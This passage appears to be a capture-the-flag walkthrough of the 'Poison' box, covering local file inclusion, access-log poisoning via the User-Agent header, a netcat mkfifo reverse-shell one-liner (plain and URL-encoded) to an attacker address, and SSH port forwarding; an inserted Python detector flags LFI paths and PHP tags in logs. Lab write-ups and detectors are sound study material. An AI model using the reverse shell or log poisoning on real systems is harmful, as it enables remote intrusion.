Decoded content of the response
I tried again to decode the password file and I think I got it:
Now it is time to find a way to use the LFI to get RCE.
And this password actually worked for SSH:
I got the user flag, although the name of the box is “Poison” and there is a valid LFI with access to log files, so I am probably supposed to poison the logs to get RCE or a reverse shell.
First, I will try with the User-Agent header.
Now with a double quote:
To make sure the next steps go well, I decided to restart the machine. It is not a good way of doing pentests, but I wanted to check the response to this string escape.
After the restart, I check httpd-access.log:
Request:
Logs:
Next test:
Trying to get a reverse shell:
Netcat check to see whether a connection between me and the remote host is possible:
The connection occurred. Now I need to modify the previous netcat reverse shell to make it executable.
Payload:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Encoded payload (URL-encoded in Burp with Ctrl+U):
rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.7+1234+>/tmp/f
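From the defender's side, the log poisoning described above leaves two traces in httpd-access.log: request paths that point at log files or use traversal, and a User-Agent (or Referer) carrying a PHP tag. The following is an added example, not code from the original writeup, that parses Apache/httpd combined-format lines and flags both; the log lines are constructed for this example and the benign PHP tag stands in for whatever was actually injected.

```python
import re

# Constructed sample lines in httpd combined log format (not the box's real log).
SAMPLE_LOG = """\
10.10.14.7 - - [12/Mar/2018:10:01:02 +0100] "GET /browse.php?file=listfiles.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.7 - - [12/Mar/2018:10:01:09 +0100] "GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1" 200 90112 "-" "Mozilla/5.0"
10.10.14.7 - - [12/Mar/2018:10:01:15 +0100] "GET /browse.php?file=../../../../etc/passwd HTTP/1.1" 200 2048 "-" "curl/7.58.0"
10.10.14.7 - - [12/Mar/2018:10:01:20 +0100] "GET / HTTP/1.1" 200 300 "-" "<?php echo 'poisoned'; ?>"
"""

# Combined log format: ip ident user [time] "METHOD path proto" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A PHP open tag has no business in a client-supplied header; it is the poisoning marker.
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.IGNORECASE)
# Traversal or direct references to log files / passwd in a file-include parameter.
LFI_RE = re.compile(r'(\.\./|/etc/passwd|/var/log/|\.log\b)', re.IGNORECASE)


def analyze_line(line):
    """Return a list of finding labels for one access-log line (empty if clean)."""
    m = COMBINED_RE.match(line)
    if not m:
        return ["unparseable"]
    findings = []
    if PHP_TAG_RE.search(m["ua"]) or PHP_TAG_RE.search(m["referer"]):
        findings.append("php_tag_in_header")
    if LFI_RE.search(m["path"]):
        findings.append("lfi_pattern_in_path")
    return findings


def analyze_log(text):
    """Map 1-based line number -> findings for every suspicious line in the log text."""
    results = {}
    for n, line in enumerate(text.splitlines(), 1):
        f = analyze_line(line)
        if f:
            results[n] = f
    return results


if __name__ == "__main__":
    for n, f in analyze_log(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(f)}")
```

Running it over the constructed log flags lines 2 and 3 for the LFI patterns and line 4 for the PHP tag in the User-Agent; the clean first request produces no finding.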
Now I am supposed to find pwdbackup.txt, decode it and switch to user charix, which I did before.
I am back in my SSH shell and I run linpeas. There wasn’t any obvious way to escalate. I went through the linpeas output a few times and saw an unusual Xvnc process.
SSH Konami codes:
New line (the escape character is only recognised at the start of a line)
~C (opens the SSH command line)
-D 5801 (asks the SSH client to forward a port; dynamic forwarding on local port 5801)